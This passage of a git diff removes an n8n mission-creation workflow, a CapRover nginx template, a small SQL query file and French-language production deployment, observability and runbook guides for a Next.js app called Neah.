`https://dome-api.slm-lab.net/missions/${logoPath}` : '';\n\n// Log the output for debugging\nconsole.log('Set Logo Path - Output:', { \n sanitizedName,\n logoPath, \n logoUrl,\n hasMissionData: !!missionData,\n missionDataKeys: Object.keys(missionData)\n});\n\n// Return both the path and URL\nreturn {\n logoPath,\n logoUrl,\n ...input // Preserve all other input data\n};" - }, - "id": "d8c15a4c-4d2b-4a15-8538-eec70dc7e898", - "name": "Set Logo Path", - "type": "n8n-nodes-base.function", - "typeVersion": 1, - "position": [ - -300, - 480 - ] - } - ], - "pinData": {}, - "connections": { - "Process Mission Data": { - "main": [ - [ - { - "node": "Decode Logo Data", - "type": "main", - "index": 0 - } - ] - ] - }, - "Decode Logo Data": { - "main": [ - [ - { - "node": "Debug Binary Data", - "type": "main", - "index": 0 - } - ] - ] - }, - "Debug Binary Data": { - "main": [ - [ - { - "node": "S3 Upload Logo", - "type": "main", - "index": 0 - } - ] - ] - }, - "S3 Upload Logo": { - "main": [ - [ - { - "node": "Set Logo Path", - "type": "main", - "index": 0 - } - ] - ] - }, - "Set Logo Path": { - "main": [ - [ - { - "node": "Process Upload Results", - "type": "main", - "index": 0 - } - ] - ] - }, - "Process Upload Results": { - "main": [ - [ - { - "node": "Check Attachments", - "type": "main", - "index": 0 - } - ] - ] - }, - "Check Attachments": { - "main": [ - [ - { - "node": "IF Has Attachments", - "type": "main", - "index": 0 - } - ] - ] - }, - "IF Has Attachments": { - "main": [ - [ - { - "node": "Process Attachment Data", - "type": "main", - "index": 0 - } - ], - [ - { - "node": "Empty Attachment Result", - "type": "main", - "index": 0 - } - ] - ] - }, - "Process Attachment Data": { - "main": [ - [ - { - "node": "S3 Upload Attachments", - "type": "main", - "index": 0 - } - ] - ] - }, - "S3 Upload Attachments": { - "main": [ - [ - { - "node": "Get Keycloak Token", - "type": "main", - "index": 0 - } - ] - ] - }, - "Empty Attachment Result": { - "main": [ - [ - { - "node": "Get Keycloak Token", - "type": "main", - "index": 0 - } - ] - ] - }, - "Get Keycloak Token": { - "main": [ - [ - { - "node": "Process Token", - "type": "main", - "index": 0 - } - ] - ] - }, - "Process Token": { - "main": [ - [ - { - "node": "Debug Service Data", - "type": "main", - "index": 0 - } - ] - ] - }, - "Debug Service Data": { - "main": [ - [ - { - "node": "Merge Paths", - "type": "main", - "index": 0 - } - ] - ] - }, - "Merge Paths": { - "main": [ - [ - { - "node": "IF Run Integrations", - "type": "main", - "index": 0 - } - ] - ] - }, - "IF Run Integrations": { - "main": [ - [ - { - "node": "IF Needs Git Repository", - "type": "main", - "index": 0 - } - ], - [ - { - "node": "Combine Results", - "type": "main", - "index": 0 - } - ] - ] - }, - "IF Needs Git Repository": { - "main": [ - [ - { - "node": "Create Git Repository", - "type": "main", - "index": 0 - } - ], - [ - { - "node": "Create Leantime Project", - "type": "main", - "index": 0 - } - ] - ] - }, - "Create Git Repository": { - "main": [ - [ - { - "node": "Create Leantime Project", - "type": "main", - "index": 0 - } - ] - ] - }, - "Create Leantime Project": { - "main": [ - [ - { - "node": "Create Documentation Collection", - "type": "main", - "index": 0 - } - ] - ] - }, - "Create Documentation Collection": { - "main": [ - [ - { - "node": "Create RocketChat Channel", - "type": "main", - "index": 0 - } - ] - ] - }, - "Create RocketChat Channel": { - "main": [ - [ - { - "node": "Combine Results", - "type": "main", - "index": 0 - } - ] - ] - }, - "Combine Results": { 
- "main": [ - [ - { - "node": "Save Mission To API", - "type": "main", - "index": 0 - } - ] - ] - }, - "Save Mission To API": { - "main": [ - [ - { - "node": "Process Results", - "type": "main", - "index": 0 - } - ] - ] - }, - "Process Results": { - "main": [ - [ - { - "node": "Respond To Webhook", - "type": "main", - "index": 0 - } - ] - ] - }, - "Mission Created Webhook": { - "main": [ - [ - { - "node": "Process Mission Data", - "type": "main", - "index": 0 - } - ] - ] - } - }, - "active": false, - "settings": { - "executionOrder": "v1" - }, - "versionId": "dbf86c0d-d0f8-48c4-95e3-5b6a409a9cee", - "meta": { - "templateCredsSetupCompleted": true, - "instanceId": "575d8de48bd511243817deebddae0cc97d73be64c6c4737e5d4e9caddec881d8" - }, - "id": "pYPCwygv5xatdCQK", - "tags": [] -} \ No newline at end of file diff --git a/caprover-nginx-template-fixed.conf b/caprover-nginx-template-fixed.conf deleted file mode 100644 index 4de76e8..0000000 --- a/caprover-nginx-template-fixed.conf +++ /dev/null @@ -1,137 +0,0 @@ -<% -if (s.forceSsl) { -%> - server { - - listen 80; - - server_name <%-s.publicDomain%>; - - # Used by Lets Encrypt - location /.well-known/acme-challenge/ { - root <%-s.staticWebRoot%>; - } - - # Used by CapRover for health check - location /.well-known/captain-identifier { - root <%-s.staticWebRoot%>; - } - - location / { - return 302 https://$http_host$request_uri; - } - } -<% -} -%> - - -server { - - <% - if (!s.forceSsl) { - %> - listen 80; - <% - } - if (s.hasSsl) { - %> - listen 443 ssl; - http2 on; - ssl_certificate <%-s.crtPath%>; - ssl_certificate_key <%-s.keyPath%>; - <% - } - if (s.logAccessPath) { - %> - access_log <%-s.logAccessPath%>; - <% - } - %> - - client_max_body_size 500m; - - server_name <%-s.publicDomain%>; - - # 127.0.0.11 is DNS set up by Docker, see: - # https://docs.docker.com/engine/userguide/networking/configure-dns/ - # https://github.com/moby/moby/issues/20026 - resolver 127.0.0.11 valid=10s; - # IMPORTANT!! If you are here from an old thread to set a custom port, you do not need to modify this port manually here!! 
- # Simply change the Container HTTP Port from the dashboard HTTP panel
- set $upstream http://172.16.0.102:3000;
-
- location / {
-
- <%
- if (s.redirectToPath) {
- %>
- return 302 <%-s.redirectToPath%>$request_uri;
- <%
- } else {
- %>
-
- <%
- if (s.httpBasicAuthPath) {
- %>
- auth_basic "Restricted Access";
- auth_basic_user_file <%-s.httpBasicAuthPath%>;
- <%
- }
- %>
-
- # ============================================
- # FIX: Raise the header buffer limits for NextAuth
- # Resolves the "upstream sent too big header" error
- # ============================================
- proxy_buffer_size 16k;
- proxy_buffers 8 16k;
- proxy_busy_buffers_size 32k;
- large_client_header_buffers 4 32k;
-
- # Timeouts to avoid hung upstream connections
- proxy_connect_timeout 60s;
- proxy_send_timeout 60s;
- proxy_read_timeout 60s;
-
- proxy_pass $upstream;
- proxy_set_header Host $host;
- proxy_set_header X-Real-IP $remote_addr;
- proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
- proxy_set_header X-Forwarded-Proto $scheme;
-
- <%
- if (s.websocketSupport) {
- %>
- proxy_set_header Upgrade $http_upgrade;
- proxy_set_header Connection "upgrade";
- proxy_http_version 1.1;
- <%
- }
- %>
-
- <%
- }
- %>
-
- }
-
- # Used by Lets Encrypt
- location /.well-known/acme-challenge/ {
- root <%-s.staticWebRoot%>;
- }
-
- # Used by CapRover for health check
- location /.well-known/captain-identifier {
- root <%-s.staticWebRoot%>;
- }
-
- error_page 502 /captain_502_custom_error_page.html;
- location = /captain_502_custom_error_page.html {
- root <%-s.customErrorPagesDirectory%>;
- internal;
- }
-}
-
diff --git a/db_query.sql b/db_query.sql
deleted file mode 100644
index 7455b4e..0000000
--- a/db_query.sql
+++ /dev/null
@@ -1 +0,0 @@
-SELECT * FROM "MailCredentials" LIMIT 5;
diff --git a/docs/DEPLOYMENT.md b/docs/DEPLOYMENT.md
deleted file mode 100644
index 20edf8c..0000000
--- a/docs/DEPLOYMENT.md
+++ /dev/null
@@ -1,370 +0,0 @@
-# Production Deployment Guide - Neah
-
-This document describes the procedures for deploying Neah to production with Vercel (Next.js) and self-hosted PostgreSQL.
-
-## Production Architecture
-
-```
-┌─────────────────┐
-│      Users      │
-└────────┬────────┘
-         │
-         ▼
-┌─────────────────┐
-│ Vercel (Next.js)│
-│  - Frontend     │
-│  - API Routes   │
-└────────┬────────┘
-         │
-         ├─────────────────┐
-         │                 │
-         ▼                 ▼
-┌─────────────────┐ ┌─────────────────┐
-│   PostgreSQL    │ │      Redis      │
-│  (Self-hosted)  │ │  (Self-hosted)  │
-└─────────────────┘ └─────────────────┘
-```
-
-## Prerequisites
-
-- A Vercel account
-- A server for PostgreSQL and Redis (VPS, VM, or Docker container)
-- SSH access to the database server
-- Node.js 22+ installed locally (for the migrations)
-
-## Step 1: Production PostgreSQL Setup
-
-### 1.1 Deploy PostgreSQL with Docker Compose
-
-On your production server:
-
-```bash
-# Copy the docker-compose.prod.yml file
-scp docker-compose.prod.yml user@your-server:/opt/neah/
-
-# Connect to the server
-ssh user@your-server
-
-# Create a .env file for the secrets
-cd /opt/neah
-cat > .env << EOF
-POSTGRES_USER=neah_prod_user
-POSTGRES_PASSWORD=$(openssl rand -base64 32)
-POSTGRES_DB=calendar_db
-REDIS_PASSWORD=$(openssl rand -base64 32)
-EOF
-
-# Start the services
-docker-compose -f docker-compose.prod.yml up -d
-
-# Check that the services are running
-docker-compose -f docker-compose.prod.yml ps
-```
-
-### 1.2 Configure network access
-
-**Option A: SSH tunnel (recommended for Vercel)**
-
-From your local machine or a bastion host:
-
-```bash
-# Open an SSH tunnel to PostgreSQL
-ssh -L 5432:localhost:5432 -N user@your-server
-
-# In another terminal, test the connection
-psql postgresql://neah_prod_user:password@localhost:5432/calendar_db
-```
-
-**Option B: Expose PostgreSQL with SSL**
-
-Edit `docker-compose.prod.yml` to enable SSL:
-
-```yaml
-db:
-  environment:
-    POSTGRES_INITDB_ARGS: "-E UTF8 --locale=C"
-  command: >
-    postgres
-    -c ssl=on
-    -c ssl_cert_file=/var/lib/postgresql/server.crt
-    -c ssl_key_file=/var/lib/postgresql/server.key
-  volumes:
-    - postgres_data:/var/lib/postgresql/data
-    - ./ssl:/var/lib/postgresql
-```
-
-Then expose the port behind a firewall configured to accept only Vercel's IPs (a sketch follows below).
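-
-As a minimal sketch of such a firewall rule (assuming ufw on Ubuntu; the source address below is a placeholder, and standard Vercel plans do not guarantee fixed egress IPs, so prefer the SSH tunnel unless you control the client addresses):
-
-```bash
-# Deny everything inbound by default, keep SSH, then allow PostgreSQL
-# only from a known source IP (placeholder address)
-sudo ufw default deny incoming
-sudo ufw allow ssh
-sudo ufw allow from 203.0.113.10 to any port 5432 proto tcp
-sudo ufw enable
-```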
-
-### 1.3 Create the database and apply the migrations
-
-```bash
-# Connect to the PostgreSQL container
-docker exec -it neah-postgres-prod psql -U neah_prod_user -d calendar_db
-
-# Or from outside (if reachable)
-export DATABASE_URL="postgresql://neah_prod_user:password@your-server:5432/calendar_db"
-npx prisma migrate deploy
-```
-
-## Step 2: Vercel Setup
-
-### 2.1 Create a Vercel project
-
-1. Sign in to [Vercel](https://vercel.com)
-2. Import your GitHub/GitLab repository
-3. Configure the project:
-   - **Framework Preset**: Next.js
-   - **Build Command**: `npm run build`
-   - **Output Directory**: `.next` (default)
-   - **Install Command**: `npm ci`
-
-### 2.2 Configure the environment variables
-
-In Vercel Dashboard → Project Settings → Environment Variables, add:
-
-#### Required variables
-
-```env
-# Environment
-NODE_ENV=production
-NEXTAUTH_URL=https://your-domain.vercel.app
-NEXTAUTH_SECRET=
-
-# Database (via SSH tunnel or public URL with SSL)
-DATABASE_URL=postgresql://user:password@host:5432/calendar_db?sslmode=require
-
-# Keycloak
-KEYCLOAK_BASE_URL=https://keycloak.example.com
-KEYCLOAK_REALM=neah
-KEYCLOAK_CLIENT_ID=neah-app
-KEYCLOAK_CLIENT_SECRET=
-KEYCLOAK_ISSUER=https://keycloak.example.com/realms/neah
-NEXT_PUBLIC_KEYCLOAK_ISSUER=https://keycloak.example.com/realms/neah
-
-# Redis (if reachable from Vercel)
-REDIS_URL=redis://:password@your-server:6379
-# OR
-REDIS_HOST=your-server
-REDIS_PORT=6379
-REDIS_PASSWORD=
-REDIS_ENCRYPTION_KEY=
-```
-
-#### Optional variables (depending on your integrations)
-
-```env
-# Leantime
-LEANTIME_API_URL=https://leantime.example.com
-LEANTIME_TOKEN=
-
-# RocketChat
-ROCKET_CHAT_TOKEN=
-ROCKET_CHAT_USER_ID=
-ROCKET_CHAT_CREATE_TOKEN_SECRET= # Required for RocketChat 8.0.2+ (must match CREATE_TOKENS_FOR_USERS_SECRET on RocketChat server)
-NEXT_PUBLIC_IFRAME_PAROLE_URL=https://rocketchat.example.com/channel/general
-
-# N8N
-N8N_API_KEY=
-N8N_WEBHOOK_URL=https://brain.slm-lab.net/webhook/mission-created
-N8N_ROLLBACK_WEBHOOK_URL=https://brain.slm-lab.net/webhook/mission-rollback
-N8N_DELETE_WEBHOOK_URL=https://brain.slm-lab.net/webhook/mission-delete
-NEXT_PUBLIC_API_URL=https://api.slm-lab.net/api
-
-# Dolibarr
-DOLIBARR_API_URL=https://dolibarr.example.com
-DOLIBARR_API_KEY=
-
-# S3 / MinIO
-S3_BUCKET=missions
-MINIO_S3_UPLOAD_BUCKET_URL=https://dome-api.slm-lab.net
-MINIO_AWS_REGION=us-east-1
-MINIO_AWS_S3_UPLOAD_BUCKET_NAME=missions
-MINIO_ACCESS_KEY=
-MINIO_SECRET_KEY=
-
-# Iframes (as needed)
-NEXT_PUBLIC_IFRAME_CARNET_URL=https://carnet.example.com
-NEXT_PUBLIC_IFRAME_DRIVE_URL=https://drive.example.com
-# ... (see .env.example for the full list)
-```
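-
-The secrets left blank above (`NEXTAUTH_SECRET`, `REDIS_ENCRYPTION_KEY`, API tokens) need strong random values; one common way to generate them:
-
-```bash
-# Generate a random 32-byte base64 secret, one per variable
-openssl rand -base64 32
-```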
-
-### 2.3 Configure a custom domain (optional)
-
-1. In Vercel Dashboard → Settings → Domains
-2. Add your domain
-3. Configure the DNS records according to Vercel's instructions
-
-## Step 3: Prisma Migrations in Production
-
-### 3.1 Prepare the migrations
-
-```bash
-# Check migration status
-npx prisma migrate status
-
-# Create a new migration (if needed)
-npx prisma migrate dev --name migration_name
-```
-
-### 3.2 Apply the migrations in production
-
-**Method 1: Via Vercel build hook (recommended)**
-
-Add a migration script to `package.json`:
-
-```json
-{
-  "scripts": {
-    "migrate:deploy": "prisma migrate deploy",
-    "postbuild": "npm run migrate:deploy"
-  }
-}
-```
-
-**Method 2: Manually before each deployment**
-
-```bash
-# From your local machine (with the SSH tunnel active)
-export DATABASE_URL="postgresql://user:password@localhost:5432/calendar_db"
-npx prisma migrate deploy
-```
-
-**Method 3: Via GitHub Actions (CI/CD)**
-
-Create `.github/workflows/migrate.yml`:
-
-```yaml
-name: Database Migrations
-
-on:
-  push:
-    branches: [main]
-
-jobs:
-  migrate:
-    runs-on: ubuntu-latest
-    steps:
-      - uses: actions/checkout@v3
-      - uses: actions/setup-node@v3
-        with:
-          node-version: '22'
-      - run: npm ci
-      - run: npx prisma migrate deploy
-        env:
-          DATABASE_URL: ${{ secrets.DATABASE_URL }}
-```
-
-## Step 4: Verification and Tests
-
-### 4.1 Verify the database connection
-
-```bash
-# Test the PostgreSQL connection
-psql $DATABASE_URL -c "SELECT version();"
-
-# Check the Prisma tables
-npx prisma db pull
-```
-
-### 4.2 Verify the external services
-
-- Test Keycloak authentication
-- Check the Redis connection (if used)
-- Test the integrations (Leantime, RocketChat, etc.)
-
-### 4.3 End-to-end tests
-
-1. Open your Vercel application
-2. Test signing in
-3. Test the critical features:
-   - Account creation
-   - Authentication
-   - Mission creation
-   - File uploads
-   - Notifications
-
-## Step 5: Monitoring and Maintenance
-
-### 5.1 Vercel logs
-
-- Check the logs in Vercel Dashboard → Deployments → [Deployment] → Logs
-- Set up alerts for errors
-
-### 5.2 PostgreSQL monitoring
-
-```bash
-# Check PostgreSQL health
-docker exec neah-postgres-prod pg_isready
-
-# Check resource usage
-docker stats neah-postgres-prod
-
-# Check active connections
-docker exec neah-postgres-prod psql -U neah_prod_user -d calendar_db -c "SELECT count(*) FROM pg_stat_activity;"
-```
-
-### 5.3 Backups
-
-**PostgreSQL backup:**
-
-```bash
-# Full backup
-docker exec neah-postgres-prod pg_dump -U neah_prod_user calendar_db > backup_$(date +%Y%m%d).sql
-
-# Compressed backup
-docker exec neah-postgres-prod pg_dump -U neah_prod_user calendar_db | gzip > backup_$(date +%Y%m%d).sql.gz
-```
-
-**Restore:**
-
-```bash
-# Restore from a backup
-cat backup_20240112.sql | docker exec -i neah-postgres-prod psql -U neah_prod_user calendar_db
-```
-
-## Rollback Procedures
-
-### Vercel rollback
-
-1. In Vercel Dashboard → Deployments
-2. Find the previous deployment
-3. Click "..." → "Promote to Production"
-
-### Prisma migration rollback
-
-```bash
-# List the migrations
-npx prisma migrate status
-
-# Manual rollback (if needed)
-# WARNING: Test in staging first!
-psql $DATABASE_URL -f prisma/migrations/[migration_to_rollback]/migration.sql
-```
-
-## Troubleshooting
-
-### Problem: PostgreSQL connection fails from Vercel
-
-- Check that the SSH tunnel is up (if used)
-- Check the credentials in Vercel
-- Check the firewall rules
-- Test the connection from your local machine
-
-### Problem: Migrations fail
-
-- Check that `DATABASE_URL` is correct
-- Check the PostgreSQL user's permissions
-- Check the logs: `npx prisma migrate deploy --verbose`
-
-### Problem: NextAuth errors
-
-- Check that `NEXTAUTH_URL` matches your Vercel domain
-- Check that `NEXTAUTH_SECRET` is set
-- Check the Keycloak configuration
-
-## Resources
-
-- [Vercel documentation](https://vercel.com/docs)
-- [Prisma documentation](https://www.prisma.io/docs)
-- [NextAuth documentation](https://next-auth.js.org)
-- [Docker Compose documentation](https://docs.docker.com/compose/)
diff --git a/docs/OBSERVABILITY.md b/docs/OBSERVABILITY.md
deleted file mode 100644
index 9dbcc74..0000000
--- a/docs/OBSERVABILITY.md
+++ /dev/null
@@ -1,369 +0,0 @@
-# Observability and Monitoring - Neah
-
-This document describes the observability strategy for Neah in production.
-
-## Overview
-
-Observability rests on three pillars:
-- **Logs**: recording events and errors
-- **Metrics**: performance and system-health measurements
-- **Traces**: following requests through the system
-
-## 1. Logs
-
-### 1.1 Vercel logs
-
-Vercel provides built-in logs for every deployment:
-
-**Access:**
-- Vercel Dashboard → Project → Deployments → [Deployment] → Logs
-- Or via CLI: `vercel logs [deployment-url]`
-
-**Log types:**
-- Build logs: compilation errors
-- Runtime logs: runtime errors and application logs
-- Edge logs: Edge function logs
-
-**Configuration:**
-
-Logs are collected automatically. To improve visibility:
-
-```typescript
-// lib/logger.ts (already present in the project)
-import { logger } from '@/lib/logger';
-
-// Usage
-logger.info('User logged in', { userId: user.id });
-logger.error('Database connection failed', { error: error.message });
-logger.warn('Rate limit approaching', { requests: count });
-```
-
-### 1.2 PostgreSQL logs
-
-**Via Docker:**
-
-```bash
-# View the PostgreSQL logs
-docker logs neah-postgres-prod -f
-
-# Logs with timestamps
-docker logs neah-postgres-prod --timestamps -f
-```
-
-**Configuring PostgreSQL logging:**
-
-Edit `docker-compose.prod.yml`. Note that the official postgres image has no `POSTGRES_LOG_*` environment variables; logging is configured through server flags:
-
-```yaml
-db:
-  command: >
-    postgres
-    -c log_statement=all
-    -c log_destination=stderr
-```
-
-(`log_statement` accepts `all`, `ddl`, `mod`, or `none`.)
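-
-If logging every statement is too noisy in production, a common middle ground is `log_min_duration_statement`, which logs only statements slower than a threshold (the 500 ms below is just an example):
-
-```yaml
-db:
-  command: >
-    postgres
-    -c log_min_duration_statement=500
-```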
-
-### 1.3 Log centralization (optional)
-
-**Option A: Logtail (recommended for Vercel)**
-
-1. Create an account on [Logtail](https://logtail.com)
-2. Add the Vercel integration
-3. Vercel logs will be forwarded to Logtail automatically
-
-**Option B: Papertrail**
-
-1. Create an account on [Papertrail](https://papertrailapp.com)
-2. Configure a syslog endpoint
-3. Redirect the Docker logs to Papertrail:
-
-```yaml
-# docker-compose.prod.yml
-logging:
-  driver: "syslog"
-  options:
-    syslog-address: "tcp://logs.papertrailapp.com:XXXXX"
-```
-
-**Option C: Self-hosted (Loki + Grafana)**
-
-For a self-hosted solution, use Loki + Grafana:
-
-```yaml
-# docker-compose.prod.yml (addition)
-loki:
-  image: grafana/loki:latest
-  ports:
-    - "3100:3100"
-  volumes:
-    - loki_data:/loki
-
-promtail:
-  image: grafana/promtail:latest
-  volumes:
-    - /var/lib/docker/containers:/var/lib/docker/containers:ro
-    - ./promtail-config.yml:/etc/promtail/config.yml
-```
-
-## 2. Metrics
-
-### 2.1 Vercel metrics
-
-Vercel provides built-in metrics:
-
-- **Analytics**: traffic, page views, load times
-- **Speed Insights**: Core Web Vitals, response times
-- **Web Vitals**: LCP, FID, CLS
-
-**Enabling:**
-
-```bash
-npm install @vercel/analytics @vercel/speed-insights
-```
-
-```typescript
-// app/layout.tsx
-import { Analytics } from '@vercel/analytics/react';
-import { SpeedInsights } from '@vercel/speed-insights/next';
-
-export default function RootLayout({ children }) {
-  return (
-    <html>
-      <body>
-        {children}
-        <Analytics />
-        <SpeedInsights />
-      </body>
-    </html>
-  );
-}
-```
-
-### 2.2 PostgreSQL metrics
-
-**Via pg_stat_statements:**
-
-```sql
--- Enable the extension
-CREATE EXTENSION IF NOT EXISTS pg_stat_statements;
-
--- Show the slowest queries
-SELECT
-  query,
-  calls,
-  total_exec_time,
-  mean_exec_time,
-  max_exec_time
-FROM pg_stat_statements
-ORDER BY mean_exec_time DESC
-LIMIT 10;
-```
-
-**Via Docker:**
-
-```bash
-# Container statistics
-docker stats neah-postgres-prod
-
-# Detailed metrics
-docker exec neah-postgres-prod psql -U neah_prod_user -d calendar_db -c "
-SELECT
-  datname,
-  numbackends,
-  xact_commit,
-  xact_rollback,
-  blks_read,
-  blks_hit,
-  tup_returned,
-  tup_fetched
-FROM pg_stat_database
-WHERE datname = 'calendar_db';
-"
-```
-
-### 2.3 Redis metrics
-
-```bash
-# Redis statistics
-docker exec neah-redis-prod redis-cli INFO stats
-
-# Memory usage
-docker exec neah-redis-prod redis-cli INFO memory
-
-# Most-used commands
-docker exec neah-redis-prod redis-cli INFO commandstats
-```
-
-### 2.4 Monitoring with Prometheus (optional)
-
-For more advanced monitoring, use Prometheus + Grafana:
-
-```yaml
-# docker-compose.prod.yml (addition)
-prometheus:
-  image: prom/prometheus:latest
-  volumes:
-    - ./prometheus.yml:/etc/prometheus/prometheus.yml
-    - prometheus_data:/prometheus
-  ports:
-    - "9090:9090"
-
-grafana:
-  image: grafana/grafana:latest
-  ports:
-    - "3001:3000"
-  environment:
-    - GF_SECURITY_ADMIN_PASSWORD=admin
-  volumes:
-    - grafana_data:/var/lib/grafana
-```
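-
-The `./prometheus.yml` mounted above is not shown in this repository; a minimal sketch of what it could look like, assuming postgres_exporter and redis_exporter containers are also added to the compose file (both targets are assumptions):
-
-```yaml
-# prometheus.yml (hypothetical minimal scrape config)
-global:
-  scrape_interval: 15s
-
-scrape_configs:
-  - job_name: 'postgres'
-    static_configs:
-      - targets: ['postgres-exporter:9187']
-  - job_name: 'redis'
-    static_configs:
-      - targets: ['redis-exporter:9121']
-```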
-
-## 3. Alerts
-
-### 3.1 Vercel alerts
-
-Vercel automatically sends alerts for:
-- Failed deployments
-- Critical errors
-- Quota overruns
-
-**Configuration:**
-- Vercel Dashboard → Project → Settings → Notifications
-
-### 3.2 Custom alerts
-
-**Option A: Sentry (recommended)**
-
-Sentry provides advanced error tracking:
-
-```bash
-npm install @sentry/nextjs
-```
-
-```bash
-npx @sentry/wizard@latest -i nextjs
-```
-
-**Option B: Uptime Robot**
-
-To monitor availability:
-1. Create an account on [Uptime Robot](https://uptimerobot.com)
-2. Add an HTTP monitor for your Vercel domain
-3. Configure the alerts (email, Slack, etc.)
-
-**Option C: Health check endpoint**
-
-Create a health endpoint:
-
-```typescript
-// app/api/health/route.ts
-import { NextResponse } from 'next/server';
-import { getRedisClient } from '@/lib/redis';
-import { prisma } from '@/lib/prisma';
-
-export async function GET() {
-  const checks = {
-    status: 'ok',
-    timestamp: new Date().toISOString(),
-    checks: {
-      database: 'unknown',
-      redis: 'unknown',
-    },
-  };
-
-  // Check PostgreSQL
-  try {
-    await prisma.$queryRaw`SELECT 1`;
-    checks.checks.database = 'ok';
-  } catch (error) {
-    checks.checks.database = 'error';
-    checks.status = 'degraded';
-  }
-
-  // Check Redis
-  try {
-    const redis = getRedisClient();
-    await redis.ping();
-    checks.checks.redis = 'ok';
-  } catch (error) {
-    checks.checks.redis = 'error';
-    checks.status = 'degraded';
-  }
-
-  const statusCode = checks.status === 'ok' ? 200 : 503;
-  return NextResponse.json(checks, { status: statusCode });
-}
-```
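-
-Once deployed, a quick way to exercise the endpoint (the domain is a placeholder):
-
-```bash
-curl -s https://your-domain.vercel.app/api/health
-# 200 with {"status":"ok",...} when healthy;
-# 503 with "degraded" when a dependency check fails
-```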
-
-## 4. Dashboards
-
-### 4.1 Vercel dashboard
-
-The Vercel dashboard provides:
-- A deployment overview
-- Real-time analytics
-- Built-in logs
-
-### 4.2 Custom dashboard (Grafana)
-
-If you use Prometheus + Grafana:
-
-1. Create a Grafana dashboard
-2. Add panels for:
-   - HTTP error rate
-   - Response times
-   - Database usage
-   - Redis usage
-   - Application metrics
-
-## 5. Best practices
-
-### 5.1 Logging
-
-- **Appropriate level**: use `info`, `warn`, `error` depending on context
-- **Structured context**: attach relevant metadata
-- **No secrets**: never log passwords, tokens, etc.
-- **Consistent format**: use a structured JSON format
-
-```typescript
-// ✅ Good
-logger.info('User created', {
-  userId: user.id,
-  email: user.email
-});
-
-// ❌ Bad
-logger.info(`User created: ${user.password}`); // Never log secrets
-```
-
-### 5.2 Monitoring
-
-- **Key metrics**: watch error rate, latency, and throughput
-- **Relevant alerts**: alert only on critical problems
-- **SLIs/SLOs**: define service-level objectives
-
-### 5.3 Performance
-
-- **APM**: use an Application Performance Monitoring tool
-- **Profiling**: profile regularly to find bottlenecks
-- **Optimization**: optimize the slow queries you identify
-
-## 6. Recommended tools
-
-| Tool | Use | Cost |
-|------|-----|------|
-| Vercel Analytics | Built-in metrics | Free (Hobby plan) |
-| Sentry | Error tracking | Free (Developer plan) |
-| Logtail | Log centralization | Paid |
-| Uptime Robot | Uptime monitoring | Free (50 monitors) |
-| Grafana Cloud | Dashboards | Free (limited) |
-
-## 7. Setup checklist
-
-- [ ] Enable Vercel Analytics and Speed Insights
-- [ ] Configure Sentry for error tracking
-- [ ] Create an `/api/health` endpoint
-- [ ] Configure the Vercel alerts
-- [ ] Enable the PostgreSQL logs
-- [ ] Configure a log centralization service (optional)
-- [ ] Create monitoring dashboards (optional)
-- [ ] Document the alerting procedures
diff --git a/docs/RUNBOOK.md b/docs/RUNBOOK.md
deleted file mode 100644
index 4225080..0000000
--- a/docs/RUNBOOK.md
+++ /dev/null
@@ -1,588 +0,0 @@
-# Production Runbook - Neah
-
-This document contains all the operational procedures for running Neah in production.
-
-## Table of contents
-
-1. [Deployment](#deployment)
-2. [Daily operations](#daily-operations)
-3. [Incidents](#incidents)
-4. [Rollback](#rollback)
-5. [Maintenance](#maintenance)
-6. [Contacts](#contacts)
-
----
-
-## Deployment
-
-### Standard deployment (Vercel)
-
-#### Prerequisites
-
-- [ ] All Prisma migrations have been tested in staging
-- [ ] The environment variables are up to date in Vercel
-- [ ] The build passes locally: `npm run build`
-
-#### Steps
-
-1. **Check the current state**
-
-```bash
-# Check pending migrations
-npx prisma migrate status
-
-# Check the configuration
-./scripts/verify-vercel-config.sh
-```
-
-2. **Apply the Prisma migrations**
-
-```bash
-# Connect to the PostgreSQL server (via SSH tunnel if needed)
-export DATABASE_URL="postgresql://user:password@host:5432/calendar_db"
-
-# Apply the migrations
-./scripts/migrate-prod.sh
-
-# OR manually
-npx prisma migrate deploy
-```
-
-3. **Deploy to Vercel**
-
-Deployment happens automatically via Git:
-
-```bash
-# Push the changes to the main branch
-git push origin main
-
-# Vercel will deploy automatically
-# Watch the deployment in the Vercel Dashboard
-```
-
-**OR manually via the CLI:**
-
-```bash
-vercel --prod
-```
-
-4. **Verify the deployment**
-
-- [ ] Check the Vercel logs for errors
-- [ ] Hit the health endpoint: `GET https://your-domain.vercel.app/api/health`
-- [ ] Test authentication
-- [ ] Verify the critical features
-
-### Deployment with critical migrations
-
-If the migrations modify existing data:
-
-1. **Back up the database**
-
-```bash
-# Full backup
-docker exec neah-postgres-prod pg_dump -U neah_prod_user calendar_db > backup_$(date +%Y%m%d_%H%M%S).sql
-
-# Compressed backup
-docker exec neah-postgres-prod pg_dump -U neah_prod_user calendar_db | gzip > backup_$(date +%Y%m%d_%H%M%S).sql.gz
-```
-
-2. **Test the migrations in staging**
-
-3. **Apply in production** (see the standard procedure)
-
-4. **Verify data integrity**
-
-```sql
--- Example checks
-SELECT COUNT(*) FROM "User";
-SELECT COUNT(*) FROM "Mission";
-SELECT COUNT(*) FROM "Event";
-```
-
----
-
-## Daily operations
-
-### Daily checks
-
-#### 1. Application health
-
-```bash
-# Hit the health endpoint
-curl https://your-domain.vercel.app/api/health
-
-# Check recent Vercel logs
-vercel logs --follow
-```
-
-#### 2. PostgreSQL health
-
-```bash
-# Connect to the server
-ssh user@your-server
-
-# Check the container state
-docker ps | grep neah-postgres-prod
-
-# Check active connections
-docker exec neah-postgres-prod psql -U neah_prod_user -d calendar_db -c "
-SELECT count(*) as active_connections
-FROM pg_stat_activity
-WHERE datname = 'calendar_db';
-"
-
-# Check disk space
-docker exec neah-postgres-prod df -h
-```
-
-#### 3. Redis health
-
-```bash
-# Check the container state
-docker ps | grep neah-redis-prod
-
-# Check memory usage
-docker exec neah-redis-prod redis-cli INFO memory
-
-# Check the keys
-docker exec neah-redis-prod redis-cli DBSIZE
-```
-
-#### 4. Vercel metrics
-
-- Check Vercel Dashboard → Analytics
-- Verify:
-  - Error rate (< 1%)
-  - Response time (< 500ms)
-  - Normal traffic
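-
-Checks 1-3 lend themselves to automation; a minimal sketch of a script you could run from cron (the domain and container names are assumptions):
-
-```bash
-#!/bin/bash
-# daily-checks.sh (hypothetical): exit non-zero if any core service is down
-set -e
-curl -fsS https://your-domain.vercel.app/api/health > /dev/null
-docker exec neah-postgres-prod pg_isready -U neah_prod_user
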